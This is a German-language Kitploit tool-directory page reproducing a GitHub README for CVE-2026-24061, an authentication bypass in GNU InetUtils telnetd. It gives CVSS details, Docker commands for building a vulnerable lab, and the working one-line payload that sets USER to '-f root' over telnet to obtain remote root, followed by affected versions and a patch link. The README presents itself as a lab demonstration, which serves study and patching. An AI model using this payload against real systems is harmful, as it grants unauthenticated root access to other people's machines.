Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — Schwachstelle in GNU InetUtils telnetd ermöglicht Remote-Root-Zugriff | Kitploit
Tools/GitHubGitHub/lucaspdiniz/cve-2026-24061
SchwachstellenanalyseExploitationPenetrationstestsAuthentifizierungRemote-Access-Tool
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

Schwachstelle in GNU InetUtils telnetd ermöglicht Remote-Root-Zugriff

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GNU InetUtils telnetd Authentifizierungsumgehung durch Argument-Injection - CVE-2026-24061 📚

Einleitung

Eine kürzlich identifizierte Argument-Injection-Schwachstelle in GNU InetUtils telnetd ermöglicht es Angreifern, die Authentifizierung zu umgehen, indem sie die Umgebungsvariable USER auf den Wert „-f root“ setzen. Dadurch kann ein entfernter, nicht authentifizierter Angreifer Zugriff auf Systeme erhalten, die den verwundbaren telnetd-Dienst ausführen, und Privilegien auf Root-Ebene erlangen. Bei erfolgreicher Ausnutzung kann dieser Fehler es Angreifern ermöglichen, auf sensible Informationen zuzugreifen, Systemeinstellungen zu ändern und beliebige Befehle auszuführen, was möglicherweise zu einer vollständigen Kompromittierung des Systems führt.

CVSS-DetailCNA (MITRE)
Basis-Score9.8
VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienKeine
BenutzerinteraktionKeine
ScopeUnverändert
VertraulichkeitsauswirkungHoch
IntegritätsauswirkungHoch
VerfügbarkeitsauswirkungHoch
CVSSv3-Version3.1

Was ist passiert?

Wir konnten auf den Commit unten aus dem Jahr 2015 zugreifen, der die Codeänderung (Zeile 62) zeigt, die diese Schwachstelle verursacht hat.

Der Zweck dieser README besteht nur darin, die Ausführung des Exploits zu zeigen, nicht jeden Schritt, der zu dieser CVE geführt hat. Die Absicht ist jedoch, den Platzhalter %U durch den Wert zu ersetzen, der aus der Umgebungsvariable USER stammt. Diese spezielle Umgebungsvariable ist vom Benutzer kontrollierbar und kann über das Telnet-Protokoll manipuliert werden 🔥 .

Umgebung 🔓

Für diesen Test habe ich 2 Container mit Images von Docker Hub erstellt, mit einer verwundbaren Version von InetUtils.

  • Container -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

Payload 💀

Mit dem folgenden Payload ersetzen wir die Variable USER und umgehen das Authentifizierungssystem.

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

Betroffene Version ✅

  • Telnetd in GNU Inetutils bis einschließlich 2.7 ermöglicht Remote-Authentifizierung.
  • Folgen Sie dem Update auf die Ubuntu-Version. -> https://ubuntu.com/security/CVE-2026-24061

Überprüfen Sie Ihre Inetutils-Version

root@kitploit:~
hostname --version
telnetd --version


Bis zum nächsten Mal :wink:

Tool herunterladen